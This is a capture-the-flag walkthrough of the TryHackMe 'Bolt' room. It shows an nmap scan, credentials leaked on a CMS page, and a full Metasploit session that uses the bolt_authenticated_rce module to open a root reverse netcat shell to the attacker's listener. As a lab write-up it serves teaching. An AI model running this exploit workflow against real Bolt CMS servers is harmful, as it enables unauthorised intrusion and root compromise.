In this walk through, we will be going through the Bolt room from Tryhackme. This room covers the exploitation of the Bolt CMS with an authenticated Remote Code Execution exploit. The room expect basic enumeration skills and usage of the exploitation framework like Metasploit. So, let’s get started.
Machine Info:
Title | Bolt |
IPaddress | 10.10.236.41 |
Difficulty | Easy |
Objective | This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution. You should wait for at least 3-4 minutes for the machine to start properly. |
Task 1 – Deploy the machine
Task 2 – Hack your way into the machine!
Question 1 – What port number has a web server with a CMS running?
- We started with a regular nmap scan specifying the flags for Half Syn Scan and Service Detection.
wh1terose@fsociety:~$ nmap -sS -sV 10.10.236.41 Host is up (0.24s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 53/tcp filtered domain 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 8000/tcp open http (PHP 7.2.32-1) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 48.45 seconds
8000
Question 2 – What is the username we can find in the CMS?
- Explore the web application on port 8000.
bolt
Question 3 – What is the password we can find for the username?
- By Navigating to the following URL with reveal the password for the username bolt.
http://<Machine IP>:8000/entry/message-for-it-department
boltadmin123
Question 4 – What version of the CMS is installed on the server? (Ex: Name 1.1.1)
- Navigating to the following will reveal the login page for the bolt CMS. Further, logging in into the dashboard with the earlier found credentials reveals the version information of the CMS in the bottom of the page.
http://<Machine IP>:8000/bolt/login
Bolt 3.7.1
Question 5 – There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What’s its EDB-ID?
- Google the Bolt version 3.7.1 for known exploits. You will find a Exploit DB link mentioning an Authenticated Remote Code Execution exploit for Bolt 3.7.0
48296
Question 6 – Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit
Done
Question 7 – Look for flag.txt inside the machine.
- Use the metasploit bolt_authenticated_rce exploit to get the root shell and get the required flag to complete the room.
msf6 > use exploit/unix/webapp/bolt_authenticated_rce [*] Using configured payload cmd/unix/reverse_netcat msf6 exploit(unix/webapp/bolt_authenticated_rce) > show targets Exploit targets: ================= Id Name -- ---- 0 Linux (x86) 1 Linux (x64) => 2 Linux (cmd) msf6 exploit(unix/webapp/bolt_authenticated_rce) > show options Module options (exploit/unix/webapp/bolt_authenticated_rce): Name Current Setting Required Description ---- --------------- -------- ----------- FILE_TRAVERSAL_PATH ../../../public/files yes Traversal path from "/files" on the web server to "/root" on the server PASSWORD yes Password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 8000 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI / yes Base path to Bolt CMS URIPATH no The URI to use for this exploit (default is random) USERNAME yes Username to authenticate with VHOST no HTTP server virtual host When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all ad dresses. SRVPORT 8080 yes The local port to listen on. Payload options (cmd/unix/reverse_netcat): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 2 Linux (cmd) View the full module info with the info, or info -d command. msf6 exploit(unix/webapp/bolt_authenticated_rce) > set LHOST 10.18.11.103 LHOST => 10.18.11.103 msf6 exploit(unix/webapp/bolt_authenticated_rce) > set USERNAME bolt USERNAME => bolt msf6 exploit(unix/webapp/bolt_authenticated_rce) > set password boltadmin123 password => boltadmin123 msf6 exploit(unix/webapp/bolt_authenticated_rce) > set RHOSTS 10.10.236.41 RHOSTS => 10.10.236.41 msf6 exploit(unix/webapp/bolt_authenticated_rce) > exploit [*] Started reverse TCP handler on 10.18.11.103:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "jnayvn". [*] Found 3 potential token(s) for creating .php files. [+] Used token 0f1630df2cf71d71dbdd805609 to create ncwepzlb.php. [*] Attempting to execute the payload via "/files/ncwepzlb.php?jnayvn=`payload`" [!] No response, may have executed a blocking payload! [*] Command shell session 1 opened (10.18.11.103:4444 -> 10.10.236.41:58902) at 2023-05-12 22:01:49 +0530 [+] Deleted file ncwepzlb.php. [+] Reverted user profile back to original state. id uid=0(root) gid=0(root) groups=0(root) ls index.html cd /root ls cd /home ls bolt composer-setup.php flag.txt cat flag.txt THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}
Also Read: Tryhackme – Blue
Conclusion:
So that was it. We just completed the “Bolt” room. Let’s summarize it quickly. First, we started with our usual nmap scan where we found a webserver on port 8000 running the Bolt CMS. Exploring the web app reveals the username and password for the backend. Logging in with the earlier found credentials, gives us the version of the CMS running. Googling the version for known public exploits reveals an authenticated RCE for version 3.7.0. Using the Metasploit for the same and gaining the root shell gives us our final flag for the room.